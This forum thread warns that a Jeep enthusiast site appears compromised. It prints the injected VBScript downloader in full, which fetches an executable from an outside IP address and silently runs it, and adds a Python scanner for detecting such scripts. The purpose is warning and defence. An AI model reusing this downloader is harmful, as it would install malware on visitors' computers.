
Warning: Worm/Trojan/Virus at JeepsUnlimited.com

Glenn B

Member #69
NAXJA Member
Just a heads up for those that "might" visit JU.

Some visitors seem to be receiving warnings from their Anti-Virus systems after viewing JU. This does appear to be a valid issue, and their server is likely compromised.

I have sent a PM to Jason (Admin) at JU, and no response as yet. You can see posts about the issue in their support and OT forums.

The issue seems to be either a worm or trojan downloader.
This is part of the code in the file:
a.open "GET", "http://209.200.229.100/~richar8/d.exe",0
So JU is likely compromised and is pulling that .exe file from another server client account that is likely compromised.

The file loaded to your PC contains the following code:
(Do NOT try to load the code)
<script language="VBScript">
On Error Resume Next
a=location.href
done = 0
set d = document.createelement("object")
d.setattribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
set a = d.createobject("Microsoft.XMLHTTP","")
set e = d.createobject("Scripting.FileSystemObject","")
set g = d.createobject("Adodb.Stream","")
for i = 0 to 5
if i = 0 then x = "c:\windows\temp" else if i = 1 then x = "c:\temp" else if i = 2 then x = "c:\tmp" else if i = 3 then x = "c:\winnt\temp" else if i = 4 then x = "c:\" end if
h = e.buildpath(x,"\d.exe")
g.type = 1
a.open "GET", "http://209.200.229.100/~richar8/d.exe",0
a.send
g.open
g.write a.responsebody
g.savetofile h,2
g.close
if err.number <> 0 then
Err.Clear
else
set i = d.createobject("shell.application","")
i.shellexecute h,"","","open",0
exit for
End if
next
</script>
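A check a site admin could run over served pages or template files to spot this kind of injected block, added here as an example and not part of the original post. The names `scan_page` and `INDICATORS`, the three-indicator threshold, and both sample pages (with a placeholder `example.invalid` URL) are assumptions constructed for illustration; the indicator strings come from the script quoted above.

```python
import re

# Indicator strings taken from the script quoted in the post above.
INDICATORS = {
    "object_classid": re.compile(r'BD96C556-65A3-11D0-983A-00C04FC29E36', re.I),
    "xmlhttp": re.compile(r'createobject\s*\(\s*"Microsoft\.XMLHTTP"', re.I),
    "adodb_stream": re.compile(r'createobject\s*\(\s*"Adodb\.Stream"', re.I),
    "shell_exec": re.compile(r'\.shellexecute\b', re.I),
    "exe_fetch": re.compile(r'\.open\s+"GET"\s*,\s*"(https?://[^"]+\.exe)"', re.I),
}
SCRIPT_RE = re.compile(r'<script\b[^>]*>(.*?)</script\s*>', re.I | re.S)

def scan_page(html, min_hits=3):
    """Return one finding per <script> block matching >= min_hits indicators.

    Requiring several indicators together keeps ordinary scripts that merely
    use XMLHTTP from being flagged (threshold is an assumed tuning value).
    """
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        hits = sorted(n for n, rx in INDICATORS.items() if rx.search(body))
        if len(hits) >= min_hits:
            findings.append({
                "line": html.count("\n", 0, m.start()) + 1,  # 1-based line of <script>
                "indicators": hits,
                "urls": INDICATORS["exe_fetch"].findall(body),
            })
    return findings

# Constructed sample pages (not captured from any real site).
SAMPLE_INFECTED = '''<html><body>
<p>Forum index</p>
<script language="VBScript">
set d = document.createelement("object")
d.setattribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
set a = d.createobject("Microsoft.XMLHTTP","")
set g = d.createobject("Adodb.Stream","")
a.open "GET", "http://example.invalid/d.exe",0
</script>
</body></html>'''
SAMPLE_CLEAN = '''<html><body>
<script type="text/javascript">var x = new XMLHttpRequest();</script>
</body></html>'''

if __name__ == "__main__":
    for name, page in (("infected", SAMPLE_INFECTED), ("clean", SAMPLE_CLEAN)):
        print(name, scan_page(page))
```
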
 
Would this be considered a form of darwinism?
 
Ramsey said:
Would this be considered a form of darwinism?

I was just sorely tempted to put a link in but luckily it was only momentary and I resisted...
Glenn, what you doing next wed, I'm gonna be in NYC for a job interview at 10, lunch ?
 
RichP said:
I was just sorely tempted to put a link in but luckily it was only momentary and I resisted...
Glenn, what you doing next wed, I'm gonna be in NYC for a job interview at 10, lunch ?
The 27th?

Gimmee a call. My GF is in Europe all next week, so I think we can make a connection.
 
RichP said:
Glenn, what you doing next wed, I'm gonna be in NYC for a job interview at 10, lunch ?
Hoboken Hobo said:
The 27th?

Gimmee a call. My GF is in Europe all next week, so I think we can make a connection.

It makes my heart warm, when I see romance blossoming.
Good Luck Fellas. :thumbup:

:D
 
OT said:
Don't go there, or you'll be stupid.

:roflmao: :roflmao: :roflmao:
 
Hoboken Hobo said:
The 27th?

Gimmee a call. My GF is in Europe all next week, so I think we can make a connection.
we here want pics to guys...
 
What is that? Do you speak English?

What? Do you speak English?
 
Hoboken Hobo said:
Just a heads up for those that "might" visit JU.

Some visitors seem to be receiving warnings from their Anti-Virus systems after viewing JU. This does appear to be a valid issue, and their server is likely compromised.

I have sent a PM to Jason (Admin) at JU, and no response as yet. You can see posts about the issue in their support and OT forums.

Jason has been on vacation for the last 2 days, he will be back in the office on Monday. I'm sure he'll check the site sometime in the next day or so, but it might take him some time to get your PM.

I'll let him know what's up if I talk to him tomorrow.
 
RalphXJ said:
Jason has been on vacation for the last 2 days, he will be back in the office on Monday. I'm sure he'll check the site sometime in the next day or so, but it might take him some time to get your PM.

I'll let him know what's up if I talk to him tomorrow.


It's JU, if it took 3 years, the majority of us would never know (or care)
:D
 